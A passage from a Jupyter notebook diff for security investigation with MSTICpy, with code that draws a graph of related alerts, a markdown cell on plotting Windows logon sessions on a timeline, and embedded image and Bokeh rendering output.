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Nf93mgkqamcdm161/y4IObcvBg913G7dsfygc/OP2Y6zjWcbZ9+0N55JGH8+UvP9ITUt3r7Puc+PTTf5P169emWq2ms7Mz3/jGY5ky5dKcc855vX4vGhoaMmnSOdmxoztGXnxxXxYtWtjzTOMhfR1Hh/vl42/mzOv6PGfU1dXlssuuyFe+0h0Hzz77z/nhD5/LRRddnClTLslTTz3Z8zv96KOP5P771/daz+E/xyGHzoP79v0oTz31ZC655NI+j+cxY07rc6zOPPOsVCqVPPnkt3t+/iVLFmXq1Gk969yy5Y/6XO6iiy7Oc8/t6pl19Gtf+9OebfzAB67M97733Z7z/BNP/GUmTPjNnsk7duz4s3R1deWnP92fxx//80ydOu2Y/998//vd31bo6OhItVrNF7/4+V536o/2eX2dkxobTz/meb6tbX127nwmDz30aK+QOjSGP/jBP/WM2eTJ7+nzOEncmQL4X/v0p1dk7txr853v/HVmzZqbl19+KTfdND9JJY2NjVm1qqXX8tOnz8gTTzye66+/Op2dnbn88vdl//79ee21VzN+/IQMHDgwN944N9u2/UlaWzemrW19z6QAn/nMujQ1jcucOfOzZ8/uzJkzM6eccmre/vYzjrptN998a1avXpmvfvXRdHV15fzzL8iuXc/2WmbEiBF9rueZZ/6217KjRo3Oueeel9mzr8kXvrAtDz/cfYfl8AkoJk48O3feuSK33/476ew8mDFjxmbt2tYkyYYN9ybp6nU19oILLkxzc/cD3C+8sCfz51+fSqWSdetae33F7XDDhg2MhkVmAAAIKklEQVTLrbfelgULZmXw4LfltNNOywUXXJg9e3Zn3LjfyIgRI/PNbz6ezZs3ZtCgQbnvvk3HvdN1oi6++NLcfPNHs3jxTamvr8+wYaekra17Qo558xZm//79Wbhwdg4ePJhJk96Vj398VSqVSlpa7suqVSvT0dGR0aNHp61tSyqVSt773mlZtGhxli79aGpqKhkypCGtrQ8c96roibrmmmvz/PO7c+ONc1JbW5sJEybmrru6J+pYvXptWlpW57HHZqRSqclVV03PjBkfOuIzGhoasnLlqixbdlvPFeZVq7ovJJzIsX+4+vr6tLY+kLVrV6e9vT2nnnpqVq9ee9RlN23akKQrGze2ZuPG7mOpqWlcWls35fLL35frrrs6Aw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\n",
+      "text/plain": [
+       "<Figure size 1080x1080 with 1 Axes>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "alert = SecurityAlert(rel_alert_select.selected_alert)\n",
+    "grph = create_alert_graph(alert)\n",
+    "full_grph = add_related_alerts(related_alerts, grph)\n",
+    "draw_alert_entity_graph(full_grph, width=15)"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Logon Sessions\n",
+    "Logon events are key to understanding any host based activity. We have previously used MSTICpy's [timeline feature](https://msticpy.readthedocs.io/en/latest/visualization/EventTimeline.html) to display value based data such as our Azure virtual machine metrics, as well as discrete data such as alerts, however we can also use it to display multiple types of discrete data on the same timeline. This is particularly useful for Windows logon events where we plot different logon types (interactive, network, etc.) in different horizontal series."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 27,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/javascript": [
+       "try {IPython.notebook.kernel.execute(\"NOTEBOOK_URL = '\" + window.location + \"'\");} catch(err) {;}"
+      ],
+      "text/plain": [
+       "<IPython.core.display.Javascript object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"3281\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": [
+       "\n",
+       "(function(root) {\n",
+       "  function now() {\n",
+       "    return new Date();\n",
+       "  }\n",
+       "\n",
+       "  var force = true;\n",
+       "\n",
+       "  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n",
+       "    root._bokeh_onload_callbacks = [];\n",
+       "    root._bokeh_is_loading = undefined;\n",
+       "  }\n",
+       "\n",
+       "  var JS_MIME_TYPE = 'application/javascript';\n",
+       "  var HTML_MIME_TYPE = 'text/html';\n",
+       "  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n",
+       "  var CLASS_NAME = 'output_bokeh rendered_html';\n",
+       "\n",
+       "  /**\n",
+       "   * Render data to the DOM node\n",
+       "   */\n",
+       "  function render(props, node) {\n",
+       "    var script = document.createElement(\"script\");\n",
+       "    node.appendChild(script);\n",
+       "  }\n",
+       "\n",
+       "  /**\n",
+       "   * Handle when an output is cleared or removed\n",
+       "   */\n",
+       "  function handleClearOutput(event, handle) {\n",
+       "    var cell = handle.cell;\n",
+       "\n",
+       "    var id = cell.output_area._bokeh_element_id;\n",
+       "    var server_id = cell.output_area._bokeh_server_id;\n",
+       "    // Clean up Bokeh references\n",
+       "    if (id != null && id in Bokeh.index) {\n",
+       "      Bokeh.index[id].model.document.clear();\n",
+       "      delete Bokeh.index[id];\n",
+       "    }\n",
+       "\n",
+       "    if (server_id !== undefined) {\n",
+       "      // Clean up Bokeh references\n",
